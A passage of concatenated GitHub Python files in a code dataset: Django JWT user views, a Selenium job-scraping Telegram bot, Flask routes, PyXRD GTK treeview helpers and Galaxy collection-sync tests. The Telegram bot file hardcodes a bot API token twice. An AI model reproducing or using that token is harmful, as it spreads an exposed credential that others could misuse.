return feature_loader\n","repo_name":"mayankanand111/FeatureSleuth","sub_path":"DataLoader/Loader.py","file_name":"Loader.py","file_ext":"py","file_size_in_byte":6069,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"3358278604","text":"from .models import User\nfrom .serializers import UserSerializer, CustomJWTSerializer, TokenObtainPairSerializer\nfrom rest_framework_simplejwt.authentication import JWTAuthentication\nfrom rest_framework.generics import CreateAPIView, RetrieveUpdateDestroyAPIView\nfrom rest_framework.permissions import IsAuthenticated\nfrom .permissions import IsOwnerUserPermission\nfrom rest_framework.generics import CreateAPIView\nfrom rest_framework_simplejwt.views import TokenObtainPairView\nfrom drf_spectacular.utils import extend_schema\n\n\nclass LoginJWTView(TokenObtainPairView):\n serializer_class = CustomJWTSerializer\n\n @extend_schema(\n operation_id=\"api_users_login_create\", # (1) # (2)\n description=\"Route to login of users. Must be registered to get the expected return.\",\n summary=\"User login\",\n tags=[\"Login\"],\n responses={200: TokenObtainPairSerializer},\n )\n def post(self, request, *args, **kwargs):\n return super().post(request, *args, **kwargs)\n\n\nclass UserView(CreateAPIView):\n queryset = User.objects.all()\n serializer_class = UserSerializer\n\n @extend_schema(\n operation_id=\"api_users_create\", # (1) # (2)\n description=\"Route for creating users and defining their permission level.\",\n summary=\"User create\",\n tags=[\"Users\"],\n )\n def post(self, request, *args, **kwargs):\n return super().post(request, *args, **kwargs)\n\n\nclass UserDetailView(RetrieveUpdateDestroyAPIView):\n authentication_classes = [JWTAuthentication]\n permission_classes = [IsAuthenticated, IsOwnerUserPermission]\n\n queryset = User.objects.all()\n serializer_class = UserSerializer\n lookup_url_kwarg = \"user_id\"\n\n @extend_schema(\n operation_id=\"api_users_retrieve\", # (1) # (2)\n description=\"Route to return data from a single user. Must be admin or owner to be able to do the search.\",\n summary=\"Retrieve data from a user 🔐\",\n tags=[\"Users\"],\n )\n def get(self, request, *args, **kwargs):\n return super().get(request, *args, **kwargs)\n\n @extend_schema(\n operation_id=\"api_users_partial_update\", # (1) # (2)\n description=\"Route to update a user's data. Must be admin or the owner to be able to do the request.\",\n summary=\"User data update 🔐\",\n tags=[\"Users\"],\n )\n def patch(self, request, *args, **kwargs):\n return super().patch(request, *args, **kwargs)\n\n @extend_schema(\n operation_id=\"api_users_destroy\", # (1) # (2)\n description=\"Route to delete a user's data. Must be admin or the owner to be able to do the request.\",\n summary=\"User data delete 🔐\",\n tags=[\"Users\"],\n responses={204: None},\n )\n def delete(self, request, *args, **kwargs):\n return super().delete(request, *args, **kwargs)\n\n @extend_schema(\n operation_id=\"api_users_update\", # (1) # (2)\n description=\"Route to update a user completely. Must be admin or the owner to be able to do the request.\",\n summary=\"User data update 🔐\",\n exclude=True,\n tags=[\"Users\"],\n )\n def put(self, request, *args, **kwargs):\n return super().put(request, *args, **kwargs)\n","repo_name":"Lucasspindola/BiblioteKA-FinalProject-M5-Team","sub_path":"users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42158693350","text":"#import part of selenium\nfrom re import search\nfrom selenium import webdriver\nfrom time import sleep\nfrom selenium.webdriver.common.by import By\nimport pandas as pd\n#import of openpyxl\nimport openpyxl as op\n#import part of telegram Bot\nfrom telegram import Bot \nfrom telegram.ext import Updater,CallbackContext,CommandHandler,MessageHandler\nfrom telegram.update import Update\nfrom telegram.ext.filters import Filters\nimport os\n\n\n#About telegram Bot\nbot = Bot('5914709645:AAHmR9YqqtBzgGwDjY29S8DPH8w83_ybcQY')\nupdater = Updater('5914709645:AAHmR9YqqtBzgGwDjY29S8DPH8w83_ybcQY')\ndispater = updater.dispatcher\n\ndid_file_name = False\nsearch_keyword = False\ndef start(update=Update,context=CallbackContext):\n bot.send_message(chat_id=update.effective_chat.id,text='hi,your talking to info King , please enter the any related things to job like place , job position , salary , technology etc use this command to seach /search_create')\n search_create()\ndispater.add_handler(CommandHandler('start',start))\n\ndef search_create(update=Update,context=CallbackContext):\n \n bot.send_message(chat_id=update.effective_chat.id,text='Enter the keyword to search job')\n def take_search_name(update=Update,context=CallbackContext):\n global OPO \n global search_keyword\n global did_file_name\n if not search_keyword:\n keyword = update.message.text\n bot.send_message(chat_id=update.effective_chat.id,text='please wait your data is fetching!!!!!!')\n OPO = scrapy(keyword)\n if (OPO):\n search_keyword=True\n sleep(3)\n else:\n bot.send_message(chat_id=update.effective_chat.id,text='please enter the valid keyword')\n if not did_file_name:\n bot.send_message(chat_id=update.effective_chat.id,text='please enter the file name')\n if update.message.text:\n did_file_name = True\n else:\n xl_creater(OPO)\n file_name = update.message.text\n did_file_name = True\n xl_note.save(file_name+'.xlsx')\n bot.sendDocument(chat_id=update.effective_chat.id,document=open(file_name+'.xlsx','rb'))\n os.remove(file_name+'.xlsx') \n dispater.add_handler(MessageHandler(Filters.text and (~Filters.command),take_search_name)) \n \ndispater.add_handler(CommandHandler('search_create',search_create))\n\n# def file_name(update=Update,context=CallbackContext):\n \n# if not did_file_name:\n# bot.send_message(chat_id=update.effective_chat.id,text='please enter the file name')\n# else:\n# xl_creater(op)\n# file_name = update.message.text\n# did_file_name = True\n# xl_note.save(file_name+'.xlsx')\n# bot.sendDocument(chat_id=update.effective_chat.id,document=open(file_name+'.xlsx','rb'))\n# os.remove(file_name+'.xlsx')\n# dispater.add_handler(CommandHandler('file_name',file_name))\n\n#For Scraping \ndef scrapy(value):\n path = \"c://chromedriver.exe\"\n browser = webdriver.Chrome(executable_path=path)\n browser.get('https://www.foundit.in/')\n input_search = browser.find_element('id','SE_home_autocomplete')\n input_search.send_keys(value)\n\n search_btn = browser.find_element('xpath',\"//input[@class='btn']\")\n search_btn.click()\n\n listy={}\n for i in range(5):\n companies_info = browser.find_elements(By.XPATH,\"//div[@class='cardContainer']\")\n for company in companies_info:\n company_name = company.find_element(By.CLASS_NAME,\"companyName\")\n com_name = company_name.find_element(By.TAG_NAME,'p').text\n job_title = company.find_element(By.CLASS_NAME,\"jobTitle\").text\n card = company.find_element(By.CLASS_NAME,\"cardBody\")\n details = card.find_elements(By.CLASS_NAME,\"details\")\n\n listy[com_name] = [job_title,[i.text for i in details]]\n if browser.find_element(By.CLASS_NAME,\"mqfisrp-right-arrow\"):\n next = browser.find_element(By.CLASS_NAME,\"mqfisrp-right-arrow\")\n next.click()\n sleep(5)\n # print(com_name,job_title,if details[0].text, if details[1].text, if details[2].text)\n \n return listy\n\n#data into xlsx formate\ndef xl_creater(opp):\n global xl_note\n output = opp\n xl_note = op.Workbook()\n xl_note_sheet = xl_note.active\n xl_note_sheet.cell(1,1).value = 'SL NO'\n xl_note_sheet.cell(1,2).value = 'Company Name'\n xl_note_sheet.cell(1,3).value = 'Job Title'\n xl_note_sheet.cell(1,4).value = 'full/half'\n xl_note_sheet.cell(1,5).value = 'Palce'\n xl_note_sheet.cell(1,6).value = 'Experience'\n xl_note_sheet.cell(1,7).value = 'salary'\n row = 2 \n col = 1\n for index,i in enumerate(output):\n xl_note_sheet.cell(row,col).value = index+1\n xl_note_sheet.cell(row,col+1).value = i\n xl_note_sheet.cell(row,col+2).value = output[i][0]\n for j in output[i][1]:\n xl_note_sheet.cell(row,col+3).value = j\n col+=1\n col=1\n row+=1\n \n \n\nupdater.start_polling()\n\n\n\n\n \n \n","repo_name":"elecnit/info-king","sub_path":"ry.py","file_name":"ry.py","file_ext":"py","file_size_in_byte":5306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39064943266","text":"from PyQt4.QtCore import *\n\nclass taskThread(QThread):\n def __init__(self,taskfunc,mt,mode,host,port,tel_un,tel_pw,ftp_un,ftp_pw,H,M,S,MS,ref_file,aud_device):\n super(taskThread,self).__init__()\n self.taskfunc = taskfunc\n self.mt = mt\n self.mode = mode\n self.host = host\n self.port = port \n self.tel_un = tel_un\n self.tel_pw = tel_pw\n self.ftp_un = ftp_un\n self.ftp_pw = ftp_pw\n self.H = H\n self.M = M\n self.S = S\n self.MS = MS\n self.test_file = ref_file\n self.aud_device = aud_device\n def run(self):\n self.taskfunc(self.mt,self.mode,self.host,self.port,self.tel_un,self.tel_pw,self.ftp_un,self.ftp_pw,self.H,self.M,self.S,self.MS,self.test_file,self.aud_device)\n","repo_name":"brandSH/Code","sub_path":"AECTest/taskThread.py","file_name":"taskThread.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14319783908","text":"from flask import redirect, render_template, request, url_for\nfrom flask_login import login_required, current_user\n\nfrom application import app, db\nfrom application.reviews.models import Review\nfrom application.reviews.forms import ReviewForm\n\n@app.route(\"/recipes//review\", methods=[\"POST\"])\n@login_required\ndef review_create(recipe_id):\n form = ReviewForm(request.form)\n\n if not form.validate():\n return redirect(url_for(\"recipe_view\", recipe_id=recipe_id))\n\n review = Review.query.filter_by(account_id=current_user.id, recipe_id=recipe_id).first()\n if not review:\n review = Review(form.rating.data)\n review.recipe_id = recipe_id\n review.account_id = current_user.id\n db.session().add(review)\n db.session().commit()\n else:\n review.rating = form.rating.data\n db.session().commit()\n\n return redirect(url_for(\"recipe_view\", recipe_id=recipe_id))\n\n@app.route(\"/recipes//review/delete\", methods=[\"POST\"])\n@login_required\ndef review_delete(recipe_id):\n Review.query.filter_by(account_id=current_user.id, recipe_id=recipe_id).delete()\n db.session().commit()\n\n return redirect(url_for(\"recipe_view\", recipe_id=recipe_id))","repo_name":"jakekall/reseptitietokanta","sub_path":"application/reviews/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1220,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8881394770","text":"def loadScoresFromFile(fileName):\n csvFileHanlde = open(fileName, 'r')\n scores = readScoresForAllStudents(csvFileHanlde)\n csvFileHanlde.close()\n return scores\n# this function takes file handle and reads scores for each student from file\n# calls readSingleStudentScores for each like item in the file\n#Input - File handle\n#output - Dictionary of student scores in the following format\n# {'name', [22, 44, 45, 67, 56, 67, 78, 89, 98 17]}\ndef readScoresForAllStudents(csvFile):\n studentScores = dict()\n for record in csvFile:\n name, values = readSingleStudentScores(record)\n studentScores[name] = values\n return studentScores\n# function to read grades of a student into a an arry\n# this fucntion return student name and array of grades\n#\n#input - String, Single line from CSV file. Each line supposed to have \n#eleven comma seprated values, a name followed by scores from 10 tests\ndef readSingleStudentScores(csvRecord):\n values = csvRecord.strip().split(',')\n name = values.pop(0)\n #scoreList = list()\n #for value in values:\n # scoresList.append(str(value))\n #return name, scoresList\n \n return name, list(map(int, values))\n#this finction takes dictionary of student scores and calculate grade for each \n#student. Grade is average of scores from 10 tests\n#Input - Dictionary of scores, Key is student name abd value, an arry for 10 \n#scores\n#output - New dictionary with student name and single grade\n# ['name', 56] format\ndef computeGradesFromScores(scores):\n grades = dict()\n for name, values in scores.items():\n grade = sum(values)/len(values)\n grades[name] = grade\n return grades\ndef writeGradesToFile(gradesFileName, grades):\n gradesFileHanlde = open(gradesFileName, 'w')\n for name, grade in grades.items():\n gradesFileHanlde.write(name + ',' + str(grade) + '\\n')\n #gradesFileHanlde.write(str(grades))\n gradesFileHanlde.close()\n#finally the starting point for the programs\n#calls the main funtion by passing math scores csv file name\nscores = loadScoresFromFile(\"/Users/Sravani/grades/student-grade-math.csv\")\ngrades = computeGradesFromScores(scores)\nprint(grades)\nwriteGradesToFile('studentst-grades-math.txt', grades)\n#we can call t\n#scores = loadScoresFromFile('student-grades-physics.csv')\n#grades = computeGradesFromScores(scores)\n#print(grades)\n","repo_name":"sravaniguduru-del/grades","sub_path":"practice1.py","file_name":"practice1.py","file_ext":"py","file_size_in_byte":2372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5220538613","text":"import gi\ngi.require_version('Gtk', '3.0')\nfrom gi.repository import Gtk\n\nsel_modes = {\n 'NONE': Gtk.SelectionMode.NONE,\n 'SINGLE': Gtk.SelectionMode.SINGLE,\n 'BROWSE': Gtk.SelectionMode.BROWSE,\n 'MULTIPLE': Gtk.SelectionMode.MULTIPLE\n}\n\nsort_types = {\n 'ASCENDING': Gtk.SortType.ASCENDING,\n 'DESCENDING': Gtk.SortType.DESCENDING\n}\n\nfrom .cell_renderer_tools import get_default_renderer, parse_callback, parse_kwargs\n\nclass PyXRDTreeViewColumn(Gtk.TreeViewColumn):\n \"\"\"\n A custom TreeViewColumn that stores information about its attribute \n mappings and provides acces to them with the get_col_attr function.\n \"\"\"\n\n def __init__(self, title=None, cell_renderer=None, **kwargs):\n Gtk.TreeViewColumn.__init__(self, title, cell_renderer)\n self._attrs = dict()\n self.set_attributes(cell_renderer, **kwargs)\n\n def set_attributes(self, cell_renderer, **kwargs):\n for key, val in kwargs.items():\n self._attrs[key] = val\n Gtk.TreeViewColumn.set_attributes(self, cell_renderer, **kwargs)\n\n def add_attribute(self, cell_renderer, attribute, column):\n self._attrs[attribute] = column\n Gtk.TreeViewColumn.set_attributes(self, cell_renderer, attribute, column)\n\n def clear_attributes(self, cell_renderer):\n self._attrs = dict()\n Gtk.TreeViewColumn.clear_attributes(self, cell_renderer)\n\n def get_col_attr(self, attr):\n return self._attrs.get(attr, -1)\n\ndef _get_default_column(title, rend,\n data_func=None,\n spacing=0,\n visible=True,\n resizable=True,\n sizing=1,\n fixed_width=-1,\n min_width=-1,\n max_width=-1,\n expand=True,\n clickable=False,\n alignment=0.0,\n reorderable=False,\n sort_column_id=-1,\n sort_indicator=False,\n sort_order='ASCENDING',\n col_attrs={}):\n \"\"\"\n Creates a PyXRDTreeViewColumn using the arguments passed. Column \n attribute mappings are to be passed as a single dict,\n not as key-word arguments.\n \"\"\"\n try:\n sort_order = sort_types[sort_order]\n except KeyError as err:\n raise ValueError(\"Invalid value '%s' for sort order!\" % sort_order) from err \n col = PyXRDTreeViewColumn(title, rend, **col_attrs)\n if data_func is not None:\n callback, args = parse_callback(data_func)\n col.set_cell_data_func(rend, callback, args)\n col.set_spacing(spacing)\n col.set_visible(visible)\n col.set_resizable(resizable)\n col.set_sizing(sizing)\n if fixed_width >= 0:\n col.set_sizing(Gtk.TreeViewColumnSizing.Fixed)\n col.set_fixed_width(fixed_width)\n else:\n col.set_sizing(Gtk.TreeViewColumnSizing.GROW_ONLY)\n col.set_min_width(min_width)\n col.set_max_width(max_width)\n col.set_title(title)\n col.set_expand(expand)\n col.set_clickable(clickable)\n col.set_alignment(alignment)\n col.set_reorderable(reorderable)\n col.set_sort_column_id(sort_column_id)\n col.set_sort_indicator(sort_indicator)\n col.set_sort_order(sort_order)\n col.set_resizable(resizable)\n col.set_expand(expand)\n col.set_alignment(alignment)\n return col\n\ndef new_text_column(title,\n edited_callback=None,\n data_func=None,\n spacing=0,\n visible=True,\n resizable=True,\n sizing=1,\n fixed_width=-1,\n min_width=-1,\n max_width=-1,\n expand=True,\n clickable=False,\n alignment=None,\n reorderable=False,\n sort_column_id=-1,\n sort_indicator=False,\n sort_order='ASCENDING',\n **kwargs):\n \"\"\"\n Creates a TreeViewColumn packed with a CellRendererText .\n \"\"\"\n kwargs, col_attrs = parse_kwargs(**kwargs)\n alignment = alignment if alignment is not None else kwargs[\"xalign\"]\n\n rend = get_default_renderer(Gtk.CellRendererText, **kwargs)\n if edited_callback is not None:\n callback, args = parse_callback(edited_callback, reduce=False)\n rend.connect('edited', callback, *args)\n\n col = _get_default_column(\n title, rend,\n data_func=data_func,\n spacing=spacing,\n visible=visible,\n resizable=resizable,\n sizing=sizing,\n fixed_width=fixed_width,\n min_width=min_width,\n max_width=max_width,\n expand=expand,\n clickable=clickable,\n alignment=alignment,\n reorderable=reorderable,\n sort_column_id=sort_column_id,\n sort_indicator=sort_indicator,\n sort_order=sort_order,\n col_attrs=col_attrs)\n return col\n\ndef new_pb_column(title,\n data_func=None,\n spacing=0,\n visible=True,\n resizable=True,\n sizing=1,\n fixed_width=-1,\n min_width=-1,\n max_width=-1,\n expand=True,\n clickable=False,\n alignment=None,\n reorderable=False,\n sort_column_id=-1,\n sort_indicator=False,\n sort_order='ASCENDING',\n **kwargs):\n \"\"\"\n Creates a TreeViewColumn packed with a CellRendererPixbuf.\n \"\"\"\n kwargs, col_attrs = parse_kwargs(**kwargs)\n alignment = alignment if alignment is not None else kwargs[\"xalign\"]\n\n rend = get_default_renderer(Gtk.CellRendererPixbuf, **kwargs)\n\n col = _get_default_column(\n title, rend,\n data_func=data_func,\n spacing=spacing,\n visible=visible,\n resizable=resizable,\n sizing=sizing,\n fixed_width=fixed_width,\n min_width=min_width,\n max_width=max_width,\n expand=expand,\n clickable=clickable,\n alignment=alignment,\n reorderable=reorderable,\n sort_column_id=sort_column_id,\n sort_indicator=sort_indicator,\n sort_order=sort_order,\n col_attrs=col_attrs)\n return col\n\ndef new_toggle_column(title,\n data_func=None,\n toggled_callback=None,\n spacing=0,\n visible=True,\n resizable=True,\n sizing=1,\n fixed_width=-1,\n min_width=-1,\n max_width=-1,\n expand=True,\n clickable=False,\n alignment=None,\n reorderable=False,\n sort_column_id=-1,\n sort_indicator=False,\n sort_order='ASCENDING',\n **kwargs):\n \"\"\"\n Creates a TreeViewColumn packed with a CellRendererToggle.\n \"\"\"\n kwargs, col_attrs = parse_kwargs(**kwargs)\n alignment = alignment if alignment is not None else kwargs[\"xalign\"]\n\n rend = get_default_renderer(Gtk.CellRendererToggle, **kwargs)\n if toggled_callback is not None:\n callback, args = parse_callback(toggled_callback, reduce=False)\n rend.connect('toggled', callback, *args)\n\n col = _get_default_column(\n title, rend,\n data_func=data_func,\n spacing=spacing,\n visible=visible,\n resizable=resizable,\n sizing=sizing,\n fixed_width=fixed_width,\n min_width=min_width,\n max_width=max_width,\n expand=expand,\n clickable=clickable,\n alignment=alignment,\n reorderable=reorderable,\n sort_column_id=sort_column_id,\n sort_indicator=sort_indicator,\n sort_order=sort_order,\n col_attrs=col_attrs)\n return col\n\ndef new_combo_column(title,\n data_func=None,\n changed_callback=None,\n edited_callback=None,\n editing_started_callback=None,\n editing_canceled_callback=None,\n spacing=0,\n visible=True,\n resizable=True,\n sizing=1,\n fixed_width=-1,\n min_width=-1,\n max_width=-1,\n expand=True,\n clickable=False,\n alignment=None,\n reorderable=False,\n sort_column_id=-1,\n sort_indicator=False,\n sort_order='ASCENDING',\n **kwargs):\n \"\"\"\n Creates a TreeViewColumn packed with a CellRendererCombo.\n \"\"\"\n kwargs, col_attrs = parse_kwargs(**kwargs)\n alignment = alignment if alignment is not None else kwargs[\"xalign\"]\n\n rend = get_default_renderer(Gtk.CellRendererCombo, **kwargs)\n if changed_callback is not None:\n callback, args = parse_callback(changed_callback, reduce=False)\n rend.connect('changed', callback, *args)\n if edited_callback is not None:\n callback, args = parse_callback(edited_callback, reduce=False)\n rend.connect('edited', callback, *args)\n if editing_started_callback is not None:\n callback, args = parse_callback(editing_started_callback, reduce=False)\n rend.connect('editing-started', callback, *args)\n if editing_canceled_callback is not None:\n callback, args = parse_callback(editing_canceled_callback, reduce=False)\n rend.connect('editing-canceled', callback, *args)\n\n col = _get_default_column(\n title, rend,\n data_func=data_func,\n spacing=spacing,\n visible=visible,\n resizable=resizable,\n sizing=sizing,\n fixed_width=fixed_width,\n min_width=min_width,\n max_width=max_width,\n expand=expand,\n clickable=clickable,\n alignment=alignment,\n reorderable=reorderable,\n sort_column_id=sort_column_id,\n sort_indicator=sort_indicator,\n sort_order=sort_order,\n col_attrs=col_attrs)\n\n return col\n\ndef create_float_data_func(attribute='text', fmt=\"%.5f\", invalid=\"#NA#\"):\n \"\"\"\n Creates a data function that can be used to render floats as formatted\n strings, with detection of invalid values (e.g. None)\n \"\"\"\n def float_renderer(column, cell, model, itr, args=None):\n nr = model.get_value(itr, column.get_col_attr(attribute))\n try:\n cell.set_property('text', fmt % nr)\n except:\n cell.set_property('text', invalid)\n return float_renderer\n\ndef reset_columns(tv):\n \"\"\"\n Remove all columns from the treeview\n \"\"\"\n for col in tv.get_columns():\n tv.remove_column(col)\n\ndef setup_treeview(tv, model,\n reset=False,\n on_cursor_changed=None,\n on_selection_changed=None,\n sel_mode='SINGLE'):\n \"\"\"\n Sets up a treeview (signal connection, sets selection mode).\n \"\"\"\n try:\n sel_mode = sel_modes[sel_mode]\n except KeyError as err:\n raise ValueError(\"Invalid value '%s' for selection mode!\" % sel_mode) from err\n if reset: reset_columns(tv)\n sel = tv.get_selection()\n sel.set_mode(sel_mode)\n ids = ()\n if on_cursor_changed is not None:\n ids += (tv.connect('cursor_changed', on_cursor_changed),)\n if on_selection_changed is not None:\n ids += (sel.connect('changed', on_selection_changed),)\n return ids\n\n","repo_name":"PyXRD/PyXRD","sub_path":"pyxrd/generic/views/treeview_tools.py","file_name":"treeview_tools.py","file_ext":"py","file_size_in_byte":10644,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"72"} +{"seq_id":"73479925672","text":"# Imports\nfrom flask import render_template, flash, redirect\nfrom app import app\n#Import Class\nfrom .forms import LoginForm\n\n@app.route('/login', methods=['GET', 'POST'])\n\ndef login():\n form = LoginForm()\n if form.validate_on_submit():\n flash('Login requested for OpenID=\"%s\", remember_me=%s' %\n (form.openid.data, str(form.remember_me.data))\n )\n return redirect('/index')\n return render_template('login.html', title='Sign In', form=form,\n providers=app.config['OPENID_PROVIDERS'])\n\n# We don't need to get rid of this yet. If we toss it then the index page goes down.\n@app.route('/index')\n\ndef index():\n user = {'nickname': 'Fake User'}\n posts = [\n {\n \"author\": {'nickname': 'Fake User 1'},\n \"body\": \"Look at this beautiful code\"\n },\n {\n \"author\": {'nickname': 'Fake President'},\n \"body\": \"This is the best fake post, people are going to love this post.\"\n }\n ]\n\n return render_template('index.html', title='Home', user=user, posts=posts)\n","repo_name":"CliffLeonardi/FlaskApp","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28915175055","text":"n, k = input().split()\nk = int(k)\n\ndef baseTransform(value: int, base: int)->str:\n next = int(value/base)\n if(next):\n return baseTransform(next, base) + str(value%base)\n return str(value%base)\n\ndef eight2five(i: str)->str:\n if i ==\"8\":\n return \"5\"\n else :\n return i\n\nbase10 = 0\nfor j in range(k):\n r = 1\n for i in range(len(n)):\n base10 += r * int(n[len(n)-i-1])\n r *=8\n n = baseTransform(base10, 9)\n print(n)\n new = \"\"\n for l in range(len(n)):\n if n[i] ==\"8\":\n new += \"5\"\n else :\n new += n[l]\n n = new\n\nprint(n)\n\n","repo_name":"monarsan/atcoder","sub_path":"tenkei/67/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"45030513224","text":"import pytest\nimport requests\nimport hashlib\n\nfrom ..utils import get_client, clear_certified, perform_sync, iterate_all, set_synclist\n\n\ndef _assert_sync(manifest, client):\n \"\"\"\n Compares a manifest of expected collections with the state of the current system.\n\n Ensures that:\n - namespaces are created correctly\n - all the selected collections are available on\n - v3/\n - _ui/v1/repo/\n - all the selected collection versions are available on\n - _ui/v1/collection-versions/\n - deprecated content types are synced correctly\n - signatures are synced correctly\n - collection metadata is synced correctly\n \"\"\"\n\n namespaces = set()\n collections = set()\n versions = set()\n deprecated_collections = set()\n signed_collections = set()\n signed_versions = set()\n signatures = {}\n content = {}\n\n for cv in manifest:\n ns = cv[\"namespace\"]\n collection = (ns, cv[\"name\"])\n version = collection + (cv[\"version\"], )\n\n namespaces.add(ns)\n versions.add(version)\n collections.add(collection)\n content[version] = cv[\"content_count\"]\n\n if cv[\"is_signed\"]:\n signed_collections.add(collection)\n signed_versions.add(version)\n signatures[version] = cv[\"signatures\"]\n\n if cv[\"is_deprecated\"]:\n deprecated_collections.add(collection)\n\n # test that all the expected namespaces are created\n all_namespaces = set([x[\"name\"] for x in iterate_all(client, \"v3/namespaces/\")])\n assert namespaces.issubset(all_namespaces)\n\n # test that all the synced collections are on the v3 API\n synced_collections = set([(x[\"namespace\"], x[\"name\"]) for x in iterate_all(\n client,\n \"v3/plugin/ansible/content/rh-certified/collections/index/\"\n )])\n assert synced_collections == collections\n\n # Test that the _ui/v1/repo/ api returns all the synced collections\n synced_collections = set([(x[\"namespace\"][\"name\"], x[\"name\"]) for x in iterate_all(\n client,\n \"_ui/v1/repo/rh-certified/\"\n )])\n assert synced_collections == collections\n\n # Test that the _ui/v1/repo/ api returns all the synced signed collections\n synced_collections = set([(x[\"namespace\"][\"name\"], x[\"name\"]) for x in iterate_all(\n client,\n \"_ui/v1/repo/rh-certified/?sign_state=signed\"\n )])\n assert synced_collections == signed_collections\n\n # Test that the deprecated status syncs correctly\n synced_collections = set([(x[\"namespace\"][\"name\"], x[\"name\"]) for x in iterate_all(\n client,\n \"_ui/v1/repo/rh-certified/?deprecated=false\"\n )])\n assert synced_collections == collections.difference(deprecated_collections)\n\n # Test that the _ui/v1/collection-versions/ API shows the correct collections\n synced_versions = set()\n for c in iterate_all(\n client,\n \"_ui/v1/collection-versions/?repository=rh-certified\"\n ):\n version = (c[\"namespace\"], c[\"name\"], c[\"version\"])\n synced_versions.add(version)\n assert len(c[\"contents\"]) == content[version]\n\n if version in signed_versions:\n assert c[\"sign_state\"] == \"signed\"\n local_sigs = set([x[\"signature\"] for x in c[\"metadata\"][\"signatures\"]])\n manifest_sigs = set([x[\"signature\"] for x in signatures[version]])\n assert local_sigs == manifest_sigs\n else:\n assert c[\"sign_state\"] == \"unsigned\"\n assert len(c[\"metadata\"][\"signatures\"]) == 0\n\n assert synced_versions == versions\n\n\ndef _assert_namespace_sync(pah_client, crc_client, namespace):\n crc_ns = crc_client(f\"v3/namespaces/{namespace['name']}/\")\n pah_ns = pah_client(f\"v3/plugin/ansible/content/rh-certified/namespaces/{namespace['name']}\")\n pah_galaxy_ns = pah_client(f\"v3/namespaces/{namespace['name']}/\")\n\n # test the fields\n for field in (\"metadata_sha256\", \"links\", \"email\", \"description\", \"resources\", \"company\"):\n assert crc_ns[field] == pah_ns[field]\n assert crc_ns[field] == pah_galaxy_ns[field]\n\n # the url on the local namespace should be different from the remote\n assert crc_ns[\"avatar_url\"] != pah_ns[\"avatar_url\"]\n\n # test that the image downloaded correctly\n crc_avatar = requests.get(crc_ns[\"avatar_url\"], allow_redirects=True).content\n pah_avatar = requests.get(pah_ns[\"avatar_url\"], allow_redirects=True).content\n\n crc_sha = hashlib.sha256(crc_avatar).hexdigest()\n pah_sha = hashlib.sha256(pah_avatar).hexdigest()\n\n assert crc_sha == pah_sha\n assert pah_sha == pah_ns[\"avatar_sha256\"]\n\n\n@pytest.mark.sync\ndef test_basic_sync(sync_instance_crc, ansible_config):\n \"\"\"Test syncing directly from the published repo.\"\"\"\n\n config = ansible_config(profile=\"admin\")\n manifest, crc_config = sync_instance_crc\n\n pah_client = get_client(\n config=config\n )\n\n clear_certified(pah_client)\n perform_sync(pah_client, crc_config)\n\n _assert_sync(manifest, pah_client)\n\n\n@pytest.mark.sync\ndef test_synclist_sync(sync_instance_crc, ansible_config):\n \"\"\"Test syncing from a customer's synclist repo.\"\"\"\n\n config = ansible_config(profile=\"admin\")\n manifest, crc_config = sync_instance_crc\n\n pah_client = get_client(\n config=config\n )\n\n crc_client = get_client(\n config=crc_config,\n request_token=True,\n require_auth=True\n )\n\n clear_certified(pah_client)\n\n synclist_collection = manifest[0]\n synclist_manifest = manifest[1:]\n\n # Test exclude single collection\n repo = set_synclist(\n crc_client,\n [{\n \"namespace\": synclist_collection[\"namespace\"],\n \"name\": synclist_collection[\"name\"],\n }, ]\n )[\"name\"]\n\n perform_sync(pah_client, crc_config, repo=repo)\n _assert_sync(synclist_manifest, pah_client)\n\n # update synclist\n repo = set_synclist(crc_client, [])[\"name\"]\n\n perform_sync(pah_client, crc_config, repo=repo)\n _assert_sync(manifest, pah_client)\n\n\n@pytest.mark.sync\ndef test_signed_only_sync(sync_instance_crc, ansible_config):\n \"\"\"Test syncing only signed collections.\"\"\"\n\n config = ansible_config(profile=\"admin\")\n manifest, crc_config = sync_instance_crc\n\n expected_manifest = [x for x in manifest if x[\"is_signed\"]]\n\n pah_client = get_client(\n config=config\n )\n\n clear_certified(pah_client)\n\n perform_sync(pah_client, crc_config, remote_params={\"signed_only\": True})\n _assert_sync(expected_manifest, pah_client)\n\n\n# @pytest.mark.skip(\"broken by python 3.11 ... ?\")\n@pytest.mark.sync\ndef test_namespace_sync(sync_instance_crc, ansible_config):\n pah_config = ansible_config(profile=\"admin\")\n manifest, crc_config = sync_instance_crc\n\n crc_config.profile = \"admin\"\n\n pah_client = get_client(pah_config)\n crc_client = get_client(crc_config)\n\n ns_data = {\n \"name\": \"ansible\",\n \"company\": \"Red Hat\",\n \"avatar_url\": \"https://avatars.githubusercontent.com/u/2103606\",\n \"groups\": [],\n \"links\": [\n {\"name\": \"link1\", \"url\": \"http://example.com\"},\n {\"name\": \"linkmaster 2\", \"url\": \"http://example.com/example\"},\n ],\n \"email\": \"hello@world.com\",\n \"description\": (\n \"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Etiam tempus \"\n \"at urna eu auctor. Suspendisse potenti. Curabitur fringilla aliquam sem\"\n \" ac aliquet. Quisque porta augue id velit euismod, elementum vehicula \"\n \"neque volutpat.\"\n ),\n \"resources\": (\n \"# Hello World\\n\"\n \" Lorem ipsum dolor sit amet, consectetur adipiscing elit. Etiam tempus \"\n \"at urna eu auctor. Suspendisse potenti. Curabitur fringilla aliquam sem\"\n \" ac aliquet. Quisque 